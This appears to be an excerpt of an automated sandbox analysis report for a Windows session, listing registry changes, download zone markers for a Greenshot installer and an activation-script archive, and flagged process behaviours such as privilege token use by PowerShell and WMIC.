Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Windows\System32\PickerHost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" C:\Windows\System32\PickerHost.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\2 = 56003100000000004759e862100057696e646f777300400009000400efbec5522d606d59e73a2e000000a6050000000001000000000000000000000000000000407b1000570069006e0064006f0077007300000016000000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Program Files\Greenshot\Greenshot.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupView = "0" C:\Windows\System32\PickerHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell C:\Windows\System32\PickerHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings C:\Windows\system32\control.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupByKey:PID = "0" C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\2\0 = 5a003100000000006d59e73a100053797374656d33320000420009000400efbec5522d606d59e73a2e0000008f360000000001000000000000000000000000000000a7e57400530079007300740065006d0033003200000018000000 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 000000000200000001000000ffffffff C:\Program Files\Greenshot\Greenshot.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\3\0\0 = 7e003100000000006d59273b11004465736b746f7000680009000400efbe4759005f6d59273b2e000000365702000000010000000000000000003e000000000078710f004400650073006b0074006f007000000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370036003900000016000000 C:\Program Files\Greenshot\Greenshot.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\FFlags = "1092616193" C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\FFlags = "1" C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 C:\Windows\System32\PickerHost.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\3\0\MRUListEx = 00000000ffffffff C:\Program Files\Greenshot\Greenshot.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\Greenshot-INSTALLER-1.2.10.6-RELEASE.exe:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\Microsoft-Activation-Scripts-master.zip:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 506997.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\control.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\control.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\control.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\control.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Greenshot\Greenshot.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
